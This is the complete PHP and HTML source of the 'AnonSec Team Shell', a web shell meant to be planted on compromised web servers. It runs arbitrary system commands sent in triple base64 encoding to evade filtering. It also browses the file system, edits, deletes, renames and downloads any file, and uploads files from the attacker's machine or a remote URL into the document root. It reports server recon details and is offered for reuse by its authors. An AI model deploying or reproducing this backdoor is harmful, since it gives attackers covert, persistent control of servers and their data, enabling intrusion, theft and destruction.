AnonSec Team Shell

1. <!-- Thanks to all member of AnonSec Team -->
2. <!-- Recode ? Silahkan, tapi jangan lupa cantumkan nama author nya xixixi -->
3. <!-- Anon7 - AnonsecTeam -->
4.  
5.  
6.  
7. <!DOCTYPE html>
8. <html>
9. <head>
10.     <title>AnonSec Team</title>
11.     <meta name="author" content="Anon7">
12.     <meta name="viewport" content="width=device-width, initial-scale=1" />
13.     <meta name="description" content="we are party at your security !">
14.     <meta property="og:description" content="we are party at your security !">
15.     <meta property="og:image" content="https://i.imgur.com/6RSyvoJ.jpg">
16.     <meta name="robots" content="noindex">
17.     <meta name="googlebot" content="noindex">
18.     <meta name="theme-color" content="#1f1f1f">
19. </head>
20. <body bgcolor="#1f1f1f" text="#ffffff">
21. <link href="" rel="stylesheet" type="text/css">
22. <link href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.13.0/css/all.min.css" rel="stylesheet">
23. <style>
24.     @import url('https://fonts.googleapis.com/css?family=Dosis');
25.     @import url('https://fonts.googleapis.com/css?family=Bungee');
26. body {
27.     font-family: "Dosis", cursive;
28.     text-shadow:0px 0px 1px #757575;
29. }
30.  
31. body::-webkit-scrollbar {
32.   width: 12px;
33. }
34.  
35. body::-webkit-scrollbar-track {
36.   background: #1f1f1f;
37. }
38.  
39. body::-webkit-scrollbar-thumb {
40.   background-color: #1f1f1f;
41.   border: 3px solid gray;
42. }
43.  
44. #content tr:hover {
45.     background-color: #636263;
46.     text-shadow:0px 0px 10px #fff;
47. }
48.  
49. #content .first {
50.     background-color: #25383C;
51. }
52.  
53. #content .first:hover {
54.     background-color: #25383C
55.     text-shadow:0px 0px 1px #757575;
56. }
57.  
58. table {
59.     border: 1px #000000 dotted;
60.     table-layout: fixed;
61.     word-break: break-all;
62. }
63.  
64. textarea {
65.     max-width: 95%;
66.     max-height: 100%;
67.     resize: none;
68.     outline: none;
69.     overflow: auto;
70.     background: transparent;
71.     color: #fff;
72. }
73.  
74. textarea::-webkit-scrollbar {
75.   width: 12px;
76. }
77.  
78. textarea::-webkit-scrollbar-track {
79.   background: #1f1f1f;
80. }
81.  
82. textarea::-webkit-scrollbar-thumb {
83.   background-color: #1f1f1f;
84.   border: 3px solid gray;
85. }
86.  
87. a {
88.     color: #ffffff;
89.     text-decoration: none;
90. }
91.  
92. a:hover {
93.     color: gold;
94.     text-shadow:0px 0px 10px #ffffff;
95. }
96.  
97. input,select,textarea {
98.     border: 1px #000000 solid;
99.     -moz-border-radius: 5px;
100.     -webkit-border-radius:5px;
101.     border-radius:5px;
102. }
103.  
104. .gas {
105.     background-color: #1f1f1f;
106.     color: #ffffff;
107.     cursor: pointer;
108. }
109.  
110. select {
111.     background-color: transparent;
112.     color: #ffffff;
113. }
114.  
115. select:after {
116.     cursor: pointer;
117. }
118.  
119. .linka {
120.     background-color: transparent;
121.     color: #ffffff;
122. }
123.  
124. .up {
125.     background-color: transparent;
126.     color: #fff;
127. }
128.  
129. option {
130.     background-color: #1f1f1f;
131. }
132.  
133. ::-webkit-file-upload-button {
134.   background: transparent;
135.   color: #fff;
136.   border-color: #fff;
137.   cursor: pointer;
138. }
139. </style>
140. <script>
141. function setfilename(val)
142.   {
143.     filename = val.split('\\').pop().split('/').pop();
144.     //filename = filename.substring(0, filename.lastIndexOf('.'));
145.     document.getElementById('namanya').value = filename;
146.   }
147.  
148. async function loadFile(file) {
149.     let text = await file.text();
150.     document.getElementById("bepasdata").innerHTML = text;
151. }
152. </script>
153. <center>
154. <font face="Bungee" size="5">AnonSec Team</font></center>
155. <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
156. <tr><td>
157. <?php
158. //@set_time_limit(0);
159. //@error_reporting(0);
160. //@http_response_code(404);
161.  
162. ini_set('display_errors', 1);
163. ini_set('display_startup_errors', 1);
164. error_reporting(E_ALL);
165.  
166. $disfunc = @ini_get("disable_functions");
167. if (empty($disfunc)) {
168.     $disf = "<font color='gold'>NONE</font>";
169. } else {
170.     $disf = "<font color='red'>".$disfunc."</font>";
171. }
172.  
173. function author() {
174.     echo "<center><br>AnonSec - 2021</center>";
175.     exit();
176. }
177.  
178. function cekdir() {
179.     if (isset($_GET['path'])) {
180.         $lokasi = $_GET['path'];
181.     } else {
182.         $lokasi = getcwd();
183.     }
184.     if (is_writable($lokasi)) {
185.         return "<font color='green'>Writeable</font>";
186.     } else {
187.         return "<font color='red'>Writeable</font>";
188.     }
189. }
190.  
191. function cekroot() {
192.     if (is_writable($_SERVER['DOCUMENT_ROOT'])) {
193.         return "<font color='green'>Writeable</font>";
194.     } else {
195.         return "<font color='red'>Writeable</font>";
196.     }
197. }
198.  
199. function xrmdir($dir) {
200.     $items = scandir($dir);
201.     foreach ($items as $item) {
202.         if ($item === '.' || $item === '..') {
203.             continue;
204.         }
205.         $path = $dir.'/'.$item;
206.         if (is_dir($path)) {
207.             xrmdir($path);
208.         } else {
209.             unlink($path);
210.         }
211.     }
212.     rmdir($dir);
213. }
214.  
215. function dunlut($file) {
216.     if (!is_readable($file)) {
217.         red("Cannot Download File / Unreadable File !");
218.         die();
219.     }
220.     header('Content-Description: File Transfer');
221.     header('Content-Type: application/octet-stream');
222.     header('Content-Disposition: attachment; filename="'.basename($file).'"');
223.     header('Expires: 0');
224.     header('Cache-Control: must-revalidate');
225.     header('Pragma: public');
226.     header('Content-Length: ' . filesize($filepath));
227.     flush();
228.     readfile($file);
229.     die();
230. }
231.  
232. function owner($file) {
233.     if (function_exists("posix_getpwuid")) {
234.         $tod = @posix_getpwuid(fileowner($file));
235.         return "<center>".$tod['name']."</center>";
236.     } else {
237.         return "<center>".fileowner($file)."</center>";
238.     }
239. }
240.  
241. function cekwrite($lokasi) {
242.     $izin = substr(sprintf('%o', fileperms($lokasi)), -4);
243.     if (is_writable($lokasi)) {
244.         return "<font color=green>".$izin."</font>";
245.     } else {
246.         return "<font color=red>".$izin."</font>";
247.     }
248. }
249.  
250. function ekse($komend, $lokasi) {
251.     if (!function_exists("proc_open")) {
252.         die("proc_open function disabled !");
253.     } elseif (!function_exists("base64_decode")) {
254.         die("base64_decode function disabled !");
255.     }
256.     $komen = base64_decode(base64_decode(base64_decode($komend)));
257.     if (strpos($komend, "2>&1") === false) {
258.         $komen = base64_decode(base64_decode(base64_decode($komend)))." 2>&1";
259.     }
260.     $tod = @proc_open($komen, array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "r")), $pipes, $lokasi);
261.     echo "<textarea rows='25' cols='100'>".htmlspecialchars(stream_get_contents($pipes[1]))."</textarea><br><br>";
262. }
263.  
264. function ipserv() {
265.     if (empty($_SERVER['SERVER_ADDR'])) {
266.         return gethostbyname($_SERVER['SERVER_NAME']);
267.         if (empty(gethostbyname($_SERVER['SERVER_NAME']))) {
268.             return $_SERVER['SERVER_NAME'];
269.         }
270.     } else {
271.         return $_SERVER['SERVER_ADDR'];
272.     }
273. }
274.  
275. function cekfile($file) {
276.      return '<i class="fa fa-file" style="color: #d6d4ce"></i> ';
277. }
278.  
279. function filedate($file) {
280.     return date("F d Y g:i:s", filemtime($file));
281. }
282.  
283. function unzip($file, $lokasi) {
284.     if (!is_readable($file)) {
285.         red("Cannot Unzip File / Unreadable File !");
286.         die();
287.     } elseif (strpos(file_get_contents($file), "\x50\x4b\x03\x04") === false) {
288.         red("This isn't Zip File !");
289.         die();
290.     }
291.     $zip = new ZipArchive;
292.     $res = $zip -> open($file);
293.     if ($res == true) {
294.         $zip -> extractTo($lokasi);
295.         $zip -> close();
296.         green("Success Unzip File !");
297.     } else {
298.         red("Failed to Unzip File !");
299.     }
300. }
301.  
302. function green($text) {
303.     echo "<center><font color='green'>".$text."</center></font>";
304. }
305.  
306. function red($text) {
307.     echo "<center><font color='red'>".$text."</center></font>";
308. }
309.  
310. echo "Server IP : <font color=gold>".ipserv()."</font> &nbsp;/&nbsp; Your IP : <font color=gold>".$_SERVER['REMOTE_ADDR']."</font><br>";
311. echo "Web Server : <font color='gold'>".$_SERVER['SERVER_SOFTWARE']."</font><br>";
312. echo "System : <font color='gold'>".php_uname()."</font><br>";
313. echo "User : <font color='gold'>".@get_current_user()."&nbsp;</font>( <font color='gold'>".@getmyuid()."</font>)<br>";
314. echo "PHP Version : <font color='gold'>".@phpversion()."</font><br>";
315. echo "Disable Function : ".$disf."</font><br>";
316. echo "MySQL : ";
317. if (function_exists("mysql_connect")) {
318.     echo "<font color=green>ON</font>";
319. } else {
320.     echo "<font color=red>OFF</font>";
321. }
322. echo " &nbsp;|&nbsp; cURL : ";
323. if (function_exists("curl_init")) {
324.     echo "<font color=green>ON</font>";
325. } else {
326.     echo "<font color=red>OFF</font>";
327. }
328. echo " &nbsp;|&nbsp; WGET : ";
329. if (file_exists("/usr/bin/wget")) {
330.     echo "<font color=green>ON</font>";
331. } else {
332.     echo "<font color=red>OFF</font>";
333. }
334. echo " &nbsp;|&nbsp; Perl : ";
335. if (file_exists("/usr/bin/perl")) {
336.     echo "<font color=green>ON</font>";
337. } else {
338.     echo "<font color=red>OFF</font>";
339. }
340. echo " &nbsp;|&nbsp; Python : ";
341. if (file_exists("/usr/bin/python2")) {
342.     echo "<font color=green>ON</font>";
343. } else {
344.     echo "<font color=red>OFF</font>";
345. }
346.  
347. foreach($_POST as $key => $value){
348.     $_POST[$key] = stripslashes($value);
349. }
350.  
351. if(isset($_GET['path'])){
352.     $lokasi = $_GET['path'];
353.     $lokdua = $_GET['path'];
354. } else {
355.     $lokasi = getcwd();
356.     $lokdua = getcwd();
357. }
358.  
359. $lokasi = str_replace('\\','/',$lokasi);
360. $lokasis = explode('/',$lokasi);
361. $lokasinya = @scandir($lokasi);
362.  
363. echo "<br>Directory (".cekwrite($lokasi).") : &nbsp;";
364.  
365. foreach($lokasis as $id => $lok){
366.     if($lok == '' && $id == 0){
367.         $a = true;
368.         echo '<a href="?path=/">/</a>';
369.         continue;
370.     }
371.     if($lok == '') continue;
372.     echo '<a href="?path=';
373.     for($i=0;$i<=$id;$i++){
374.     echo "$lokasis[$i]";
375.     if($i != $id) echo "/";
376. }
377. echo '">'.$lok.'</a>/';
378. }
379.  
380. echo '</td></tr><tr><td>';
381. if (isset($_POST['upwkwk'])) {
382.     if ($_POST['dirnya'] == "2") {
383.             $lokasi = $_SERVER['DOCUMENT_ROOT'];
384.         }
385.     if (isset($_POST['berkasnya'])) {
386.         $data = @file_put_contents($lokasi."/".$_FILES['berkas']['name'], @file_get_contents($_FILES['berkas']['tmp_name']));
387.         if (file_exists($lokasi."/".$_FILES['berkas']['name'])) {
388.             echo "File Uploaded ! &nbsp;<font color='gold'><i>".$lokasi."/".$_FILES['berkas']['name']."</i></font><br><br>";
389.         } else {
390.             echo "<font color='red'>Failed to Upload !<br><br>";
391.         }
392.     } elseif (isset($_POST['linknya'])) {
393.         if (empty($_POST['namalink'])) {
394.             exit("Filename cannot be empty !");
395.         }
396.         if ($_POST['dirnya'] == "2") {
397.             $lokasi = $_SERVER['DOCUMENT_ROOT'];
398.         }
399.         $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink']));
400.         if (file_exists($lokasi."/".$_POST['namalink'])) {
401.             echo "File Uploaded ! &nbsp;<font color='gold'><i>".$lokasi."/".$_POST['namalink']."</i></font><br><br>";
402.         } else {
403.             echo "<font coloe='red'>Failed to Upload !<br><br>";
404.         }
405.     } elseif (isset($_POST['bepas'])) {
406.         $bepasdata = $_POST['bepasdata'];
407.         $bepasnama = $_POST['bepasnama'];
408.         if ($bepasdata) {
409.             echo "string";
410.         }
411.         @file_put_contents($lokasi."/".$bepasnama, $bepasdata);
412.         if (file_exists($lokasi."/".$bepasnama)) {
413.             echo "File Uploaded ! &nbsp;<font color='gold'><i>".$lokasi."/".$bepasnama."</i></font><br><br>";
414.         } else {
415.             echo "<font coloe='red'>Failed to Upload !<br><br>";
416.         }
417.     }
418. }
419.  
420. echo "</table><br>";
421. echo '<table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">';
422. echo '<th>[ &nbsp;<a href="'.$_SERVER['SCRIPT_NAME'].'">Home</a>&nbsp; ]</th>';
423. echo '<th>[ &nbsp;<a href="?path='.$lokasi.'&komend=gaskan">C0mmand</a>&nbsp; ]</th>';
424. echo '<th>[ &nbsp;<a href="?path='.$lokasi.'&upload=gaskan">Upload File</a>&nbsp; ]</th>';
425. echo "</table><br>";
426.  
427. if (isset($_GET['fileloc'])) {
428.     echo "<tr><td>Current File : ".$_GET['fileloc'];
429.     echo '</tr></td></table><br/>';
430.     echo "<pre>".htmlspecialchars(file_get_contents($_GET['fileloc']))."</pre>";
431.     author();
432. } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") {
433.     if (is_dir($_POST['path'])) {
434.         xrmdir($_POST['path']);
435.         if (file_exists($_POST['path'])) {
436.             red("Failed to delete Directory !");
437.         } else {
438.             green("Delete Directory Success !");
439.         }
440.     } elseif (is_file($_POST['path'])) {
441.         @unlink($_POST['path']);
442.         if (file_exists($_POST['path'])) {
443.             red("Failed to Delete File !");
444.         } else {
445.             green("Delete File <i>".basename($_POST['path'])."</i> Success !");
446.         }
447.     }
448. } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") {
449.     if (isset($_POST['gantin'])) {
450.         $ren = @rename($_POST['path'], $_POST['newname']);
451.         if ($ren == true) {
452.             green("Change Name Success !");
453.         } else {
454.             red("Change Name Failed !");
455.         }
456.     }
457.     if (empty($_POST['name'])) {
458.         $namaawal = $_POST['newname'];
459.     } else {
460.         $namawal = $_POST['name'];
461.     }
462.     echo "<center>".$_POST['path']."<br>";
463.     echo '<form method="post">
464.    New Name : <input name="newname" type="text" class="up" size="20" value="'.$namaawal.'" />
465.    <input type="hidden" name="path" value="'.$_POST['path'].'">
466.    <input type="hidden" name="pilih" value="gantinama">
467.    <input type="submit" value="Change" name="gantin" class="up" style="cursor: pointer; border-color: #fff"/>
468.    </form>';
469. } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") {
470.     if (isset($_POST['gasedit'])) {
471.         $edit = @file_put_contents($_POST['path'], $_POST['src']);
472.         if ($edit == true) {
473.             green("Edit File Success !");
474.         } else {
475.             red("Edit File Failed !");
476.         }
477.     }
478.     echo "<center>".$_POST['path']."<br><br>";
479.     echo '<form method="post">
480.    <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br>
481.    <input type="hidden" name="path" value="'.$_POST['path'].'">
482.    <input type="hidden" name="pilih" value="edit">
483.    <input type="submit" value="Edit File" name="gasedit" />
484.    </form><br>';
485. } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "dunlut") {
486.     dunlut($_POST['path']);
487. } elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "unzip") {
488.     unzip($_POST['path'], $lokasi);
489. } elseif (isset($_GET['upload'])) {
490.     echo "<center>Upload File : ";
491.     echo '<form enctype="multipart/form-data" method="post">
492. <input type="radio" value="1" name="dirnya" checked>current_dir [ '.cekdir().' ]
493. <input type="radio" value="2" name="dirnya" >document_root [ '.cekroot().' ]
494. <br>
495. <input type="hidden" name="upwkwk" value="aplod">
496. <input type="file" name="berkas"><input type="submit" name="berkasnya" value="Upload" class="up" style="cursor: pointer; border-color: #fff"><br><br>
497. Upload File From Link :<br>
498. <input type="text" name="darilink" class="up" placeholder="https://anon7.xyz/upload.txt">&nbsp;<input type="text" name="namalink" class="up" size="3" placeholder="file.txt"><input type="submit" name="linknya" class="up" value="Upload" style="cursor: pointer; border-color: #fff">
499. <br><br>403 Upload File<br>
500. <input type="file" id="datanya" onchange="setfilename(this.value); loadFile(this.files[0])"/>
501. <input type="hidden" name="bepasnama" id="namanya">
502. <textarea style="display: none" id="bepasdata" name="bepasdata"></textarea>
503. <input type="submit" name="bepas" value="Upload" class="up" style="cursor: pointer; border-color: #fff">
504. </form><br><br></center>';
505. } elseif (isset($_GET['komend'])) {
506.     echo "<center>";
507.     echo '<form method="post" onsubmit="document.getElementById(\'komendnya\').value = btoa(btoa(btoa(document.getElementById(\'komendnya\').value)))">
508.    '.@get_current_user().'@'.ipserv().':~ $ <input type="text" name="komend" id="komendnya" style="background-color: #1f1f1f; color: #fff">
509.    <input type="submit" name="eksekomend" value=" >> " class="up" style="cursor: pointer; border-color: #fff">
510.    </form><br>';
511.     if (isset($_POST['eksekomend'])) {
512.         ekse($_POST['komend'], $lokasi);
513.     }
514.     echo "</center>";
515. }
516.  
517. if (!is_readable($lokasi)) {
518.     die("<center>This directory is unreadable :(</center>");
519. }
520.  
521. echo '<div id="content"><table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
522. <tr class="first">
523. <td><center>Name</center></td>
524. <td><center>Size</center></td>
525. <td><center>Last Modified</center></td>
526. <td><center>Owner</center></td>
527. <td><center>Permissions</center></td>
528. <td><center>Options</center></td>
529. </tr>';
530.  
531. foreach($lokasinya as $dir){
532.     if(!is_dir($lokasi."/".$dir) || $dir == '.') continue;
533.     echo "<tr>
534.    <td><i class='fa fa-folder' style='color: #ffe9a2'></i> <a href=\"?path=".$lokasi."/".$dir."\">".$dir."</a></td>
535.    <td><center>--</center></td>
536.    <td><center>".filedate($lokasi."/".$dir)."</center></td>
537.    <td>".owner($lokasi."/".$dir)."</td>
538.    <td><center>";
539.     if(is_writable($lokasi."/".$dir)) echo '<font color="green">';
540.     elseif(!is_readable($lokasi."/".$dir)) echo '<font color="red">';
541.     echo statusnya($lokasi."/".$dir);
542.     if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo '</font>';
543.  
544.     echo "</center></td>
545.    <td><center><form method=\"POST\" action=\"?pilihan&path=$lokasi\">
546.    <select name=\"pilih\">
547.    <option value=\"\"></option>
548.    <option value=\"hapus\">Delete</option>
549.    <option value=\"gantinama\">Rename</option>
550.    </select>
551.    <input type=\"hidden\" name=\"type\" value=\"dir\">
552.    <input type=\"hidden\" name=\"name\" value=\"$dir\">
553.    <input type=\"hidden\" name=\"path\" value=\"$lokasi/$dir\">
554.    <input type=\"submit\" class=\"gas\" value=\">\" />
555.    </form></center></td>
556.    </tr>";
557. }
558.  
559. echo '<tr class="first"><td></td><td></td><td></td><td></td><td></td><td></td></tr>';
560. foreach($lokasinya as $file) {
561.     if(!is_file("$lokasi/$file")) continue;
562.     $size = filesize("$lokasi/$file")/1024;
563.     $size = round($size,3);
564.     if($size >= 1024){
565.     $size = round($size/1024,2).' MB';
566. } else {
567.     $size = $size.' KB';
568. }
569.  
570. echo "<tr>
571. <td>".cekfile($lokasi."/".$file)."<a href=\"?fileloc=$lokasi/$file&path=$lokasi\">$file</a></td>
572. <td><center>".$size."</center></td>
573. <td><center>".filedate($lokasi."/".$file)."</center></td>
574. <td>".owner($lokasi."/".$file)."</td>
575. <td><center>";
576. if(is_writable("$lokasi/$file")) echo '<font color="green">';
577. elseif(!is_readable("$lokasi/$file")) echo '<font color="red">';
578. echo statusnya("$lokasi/$file");
579. if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo '</font>';
580. echo "</center></td><td><center>
581. <form method=\"post\" action=\"?pilihan&path=$lokasi\">
582. <select name=\"pilih\">
583. <option value=\"\"></option>
584. <option value=\"hapus\">Delete</option>
585. <option value=\"dunlut\">Download</option>
586. <option value=\"gantinama\">Rename</option>
587. <option value=\"edit\">Edit</option>";
588. if (class_exists("ZipArchive")) {
589.     echo "<option value=\"unzip\">Unzip</option>";
590. }
591. echo "</select>
592. <input type=\"hidden\" name=\"type\" value=\"file\">
593. <input type=\"hidden\" name=\"name\" value=\"$file\">
594. <input type=\"hidden\" name=\"path\" value=\"$lokasi/$file\">
595. <input type=\"submit\" class=\"gas\" value=\">\" />
596. </form></center></td>
597. </tr>";
598. }
599. echo '</tr></td></table></table>';
600. author();
601.  
602. function statusnya($file){
603. $izin = substr(sprintf('%o', fileperms($file)), -4);
604. return $izin;
605. }
606. ?>